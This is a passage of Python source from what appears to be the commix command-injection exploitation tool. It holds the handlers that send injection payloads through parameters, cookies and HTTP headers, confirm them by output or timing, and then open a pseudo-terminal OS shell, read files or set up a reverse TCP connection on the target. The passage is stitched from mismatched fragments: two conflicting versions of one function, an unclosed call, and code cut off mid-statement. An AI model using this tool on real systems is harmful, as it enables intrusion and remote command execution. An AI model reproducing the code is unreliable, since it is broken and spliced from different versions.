vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n" elif os_shell_option == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. lhost, lport = reverse_tcp.configure_reverse_tcp() while True: if lhost and lport in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(lhost) else: cmd = reverse_tcp.reverse_tcp_options(lhost, lport) result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True break # Command execution results. from src.core.injections.results_based.techniques.classic import ( cb_injector, ) separator = checks.time_based_separators( separator, http_request_method ) whitespace = settings.WHITESPACES[0] response = cb_injector.injection( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, ) # Evaluate injection results. shell = cb_injector.injection_results(response, TAG) if menu.options.verbose: print "" print Back.RED + "(x) Error: The reverse TCP connection has been failed!" + Style.RESET_ALL else: pass else: print "" # The main command injection exploitation. check_how_long, output = tfb_injector.injection( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, ) # Export injection result tfb_injector.export_injection_results( cmd, separator, output, check_how_long ) except KeyboardInterrupt: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) raise elif gotshell in settings.CHOISE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) return True elif gotshell in settings.CHOISE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass except KeyboardInterrupt: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, ) raise break if no_result == True: print "" return False else: sys.stdout.write("\r") sys.stdout.flush()
def eb_injection_handler(url, timesec, filename, http_request_method): shell = False counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based dynamic code evaluation" technique = "dynamic code evaluation technique" for item in range(0, len(settings.EXECUTION_FUNCTIONS)): settings.EXECUTION_FUNCTIONS[item] = "${" + settings.EXECUTION_FUNCTIONS[item] + "(" settings.EVAL_PREFIXES = settings.EVAL_PREFIXES + settings.EXECUTION_FUNCTIONS if not settings.LOAD_SESSION: url = eb_injector.warning_detection(url, http_request_method) info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL >= 1: print("") i = 0 # Calculate all possible combinations total = len(settings.WHITESPACE) * len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len(settings.EVAL_SUFFIXES) for whitespace in settings.WHITESPACE: for prefix in settings.EVAL_PREFIXES: for suffix in settings.EVAL_SUFFIXES: for separator in settings.EVAL_SEPARATORS: if whitespace == " ": whitespace = _urllib.parse.quote(whitespace) # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # If a previous session is available. if settings.LOAD_SESSION and session_handler.notification(url, technique, injection_type): try: settings.EVAL_BASED_STATE = True url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method) checks.check_for_stored_tamper(payload) except TypeError: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "Use the '--flush-session' option." print(settings.print_critical_msg(err_msg)) raise SystemExit() if settings.RETEST == True: settings.RETEST = False from src.core.injections.results_based.techniques.classic import cb_handler cb_handler.exploitation(url, timesec, filename, http_request_method) if not settings.LOAD_SESSION: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 # Define alter shell alter_shell = menu.options.alter_shell try: if alter_shell: # Classic -alter shell- decision payload (check if host is vulnerable). payload = eb_payloads.decision_alter_shell(separator, TAG, randv1, randv2) else: # Classic decision payload (check if host is vulnerable). payload = eb_payloads.decision(separator, TAG, randv1, randv2) suffix = _urllib.parse.quote(suffix) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Fixation for specific payload. if ")%3B" + _urllib.parse.quote(")}") in payload: payload = payload.replace(")%3B" + _urllib.parse.quote(")}"), ")" + _urllib.parse.quote(")}")) #payload = payload + TAG + "" # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) if not settings.TAMPER_SCRIPTS['base64encode'] and \ not settings.TAMPER_SCRIPTS['hexencode']: payload = payload.replace(" ", "%20") # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: print(settings.print_payload(payload)) elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating payload for the injection..." print(settings.print_info_msg(info_msg)) print(settings.print_payload(payload)) # Cookie header injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie header injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) response = eb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent HTTP header injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent HTTP header injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) response = eb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer HTTP header injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer HTTP header injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) response = eb_injector.referer_injection_test(url, vuln_parameter, payload) # Host HTTP header injection elif settings.HOST_INJECTION == True: # Check if target host is vulnerable to host HTTP header injection. vuln_parameter = parameters.specify_host_parameter( response = eb_injector.host_injection_test(url, vuln_parameter, payload) # Custom HTTP header injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom HTTP header injection. vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG) response = eb_injector.custom_header_injection_test(url, vuln_parameter, payload) else: found_cookie_injection = False # Check if target host is vulnerable. response, vuln_parameter = eb_injector.injection_test(payload, http_request_method, url) # Try target page reload (if it is required). if settings.URL_RELOAD: response = requests.url_reload(url, timesec) # Evaluate test results. shell = eb_injector.injection_test_results(response, TAG, randvcalc) time.sleep(timesec) if not settings.VERBOSITY_LEVEL >= 1: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total * 1.0)),2)) if shell == False: info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " + "[ " + float_percent + "%" + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent)+ "%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent)+ "%" info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print(settings.print_error_msg(err_msg)) raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.HOST_INJECTION == True: header_name = " Host" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: if not settings.VERBOSITY_LEVEL >= 1: print("") else: checks.total_of_requests() # Print the findings to terminal. success_msg = "The" if len(found_vuln_parameter) > 0 and not "cookie" in header_name : success_msg += " " + http_request_method success_msg += ('', ' (JSON)')[settings.IS_JSON] + ('', ' (SOAP/XML)')[settings.IS_XML] + the_type + header_name success_msg += found_vuln_parameter + " seems injectable via " success_msg += "(" + injection_type.split(" ")[0] + ") " + technique + "." print(settings.print_success_msg(success_msg)) print(settings.SUB_CONTENT_SIGN + str(checks.url_decode(payload)) + Style.RESET_ALL) # Export session if not settings.LOAD_SESSION: session_handler.injection_point_importation(url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, timesec=0, how_long=0, output_length=0, is_vulnerable=menu.options.level) else: whitespace = settings.WHITESPACE[0] settings.LOAD_SESSION = False # Check for any enumeration options. new_line = True if settings.ENUMERATION_DONE == True : while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = _input("\n" + settings.print_question_msg(question_msg)).lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: eb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) # print("") break elif enumerate_again in settings.CHOICE_NO: new_line = False break elif enumerate_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: if menu.enumeration_options(): eb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) if not menu.file_access_options() and not menu.options.os_cmd and new_line: print("") # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : if settings.ENUMERATION_DONE != True: print("") while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " file_access_again = _input(settings.print_question_msg(question_msg)) else: file_access_again = "" if len(file_access_again) == 0: file_access_again = "y" if file_access_again in settings.CHOICE_YES: eb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) print("") break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + file_access_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: if menu.file_access_options(): # if not menu.enumeration_options(): # print("") eb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) print("") # Check if defined single cmd. if menu.options.os_cmd: # if not menu.file_access_options(): # print("") eb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " gotshell = _input(settings.print_question_msg(question_msg)) else: gotshell = "" if len(gotshell) == 0: gotshell = "y" if gotshell in settings.CHOICE_YES: if not menu.options.batch: print("") print("Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)") if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = _input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE="") if go_back and go_back_again == False: break if go_back and go_back_again: return True else: # The main command injection exploitation. time.sleep(timesec) response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Try target page reload (if it is required). if settings.URL_RELOAD: response = requests.url_reload(url, timesec) if menu.options.ignore_session or\ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # Evaluate injection results. shell = eb_injector.injection_results(response, TAG, cmd) shell = "".join(str(p) for p in shell).replace(" ", "", 1) if not menu.options.ignore_session : session_handler.store_cmd(url, cmd, shell, vuln_parameter) else: shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter) if shell != "": shell = "".join(str(p) for p in shell) # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, shell) print("\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n") else: if settings.VERBOSITY_LEVEL >= 1: print("") err_msg = "The '" + cmd + "' command, does not return any output." print(settings.print_critical_msg(err_msg) + "\n") except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print(settings.print_error_msg(err_msg)) raise elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass if no_result == True: if settings.VERBOSITY_LEVEL == 0: print("") return False else : sys.stdout.write("\r") sys.stdout.flush()
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response): counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False export_injection_info = False injection_type = "Semiblind-based Command Injection" technique = "tempfile-based injection technique" # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL # Calculate all possible combinations total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive resutls. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) # The output file for file-based injection technique. OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" alter_shell = menu.options.alter_shell tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: # Tempfile-based decision payload (check if host is vulnerable). if alter_shell : payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method) else: payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Encode payload to Base64 if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url) # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2)) if percent == 100 and no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response <= 1 and how_long >= delay) or \ (url_time_response >= 2 and how_long > delay): # Time relative false positive fixation. if len(TAG) == output_length: randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 cmd = "echo $((" + str(randv1) + "+" + str(randv2) + "))" # Check for false positive resutls output = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell) if str(output) == str(randvcalc) and len(TAG) == output_length: if not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break else: percent = str(float_percent)+"%" if not menu.options.verbose: sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: # Delete previous shell (text) files (output) from /tmp delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except: percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2)) if percent == 100: if no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() else: percent = "" break else: percent = str(float_percent)+"%" #Print logs notification message percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() print "" logs.logs_notification(filename) raise else: percent = str(float_percent)+"%" break # Yaw, got shellz! # Do some magic tricks! if (url_time_response <= 1 and how_long >= delay) or \ (url_time_response >= 2 and how_long > delay) : if len(TAG) == output_length: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: enumerate_again = raw_input("\n(?) Do you want to enumerate again? [Y/n/q] > ").lower() if enumerate_again in settings.CHOISE_YES: tfb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: # Delete previous shell (text) files (output) from /tmp delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: tfb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : while True: file_access_again = raw_input("(?) Do you want to access files again? [Y/n] > ").lower() if file_access_again in settings.CHOISE_YES: #print "" tfb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: # Delete previous shell (text) files (output) from /tmp delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: tfb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # Check if defined single cmd. if menu.options.os_cmd: check_how_long, output = tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # Exploirt injection result tfb_injector.export_injection_results(cmd, separator, output, check_how_long) # Delete previous shell (text) files (output) from /tmp delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) try: # Pseudo-Terminal shell go_back = False while True: # Delete previous shell (text) files (output) from /tmp delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if menu.options.verbose: print "" if go_back == True: break gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd == "?": menu.shell_options() continue elif cmd.lower() == "quit": # Delete previous shell (text) files (output) from /tmp delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) elif cmd.lower() == "back": go_back = True if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True else: pass else: print "" # The main command injection exploitation. check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # Exploirt injection result tfb_injector.export_injection_results(cmd, separator, output, check_how_long) except KeyboardInterrupt: # Delete previous shell (text) files (output) from /tmp delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise elif gotshell in settings.CHOISE_NO: if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: # Delete previous shell (text) files (output) from /tmp delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) return True elif gotshell in settings.CHOISE_QUIT: # Delete previous shell (text) files (output) from /tmp delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass except KeyboardInterrupt: # Delete previous shell (text) files (output) from /tmp delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise break if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def tfb_injection_handler(url, timesec, filename, tmp_path, http_request_method, url_time_response): counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False possibly_vulnerable = False false_positive_warning = False export_injection_info = False how_long = 0 injection_type = "semi-blind command injection" technique = "tempfile-based injection technique" if settings.TIME_RELATIVE_ATTACK == False: warn_msg = "It is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions." print(settings.print_warning_msg(warn_msg) + Style.RESET_ALL) settings.TIME_RELATIVE_ATTACK = None # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: err_msg = "The '--url-reload' option is not available in " + technique + "!" print(settings.print_critical_msg(err_msg)) if not settings.LOAD_SESSION: # Change TAG on every request to prevent false-positive resutls. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) if settings.VERBOSITY_LEVEL != 0: info_msg ="Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + ". " print(settings.print_info_msg(info_msg)) #whitespace = checks.check_whitespaces() # Calculate all possible combinations total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) for whitespace in settings.WHITESPACES: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # If a previous session is available. how_long_statistic = [] if settings.LOAD_SESSION: try: settings.TEMPFILE_BASED_STATE = True cmd = shell = "" url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method) checks.check_for_stored_tamper(payload) settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - timesec OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" except TypeError: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "Use the '--flush-session' option." print(settings.print_critical_msg(err_msg)) raise SystemExit() else: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # The output file for file-based injection technique. OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" alter_shell = menu.options.alter_shell tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: # Tempfile-based decision payload (check if host is vulnerable). if alter_shell : payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, timesec, http_request_method) else: payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(settings.SINGLE_WHITESPACE, whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") print(settings.print_payload(payload_msg)) elif settings.VERBOSITY_LEVEL >= 2: debug_msg = "Generating payload for the injection." print(settings.print_debug_msg(debug_msg)) print(settings.print_payload(payload)) # Cookie header injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie header injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent HTTP header injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent HTTP header injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer HTTP header injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer HTTP header injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload) # Host HTTP header injection elif settings.HOST_INJECTION == True: # Check if target host is 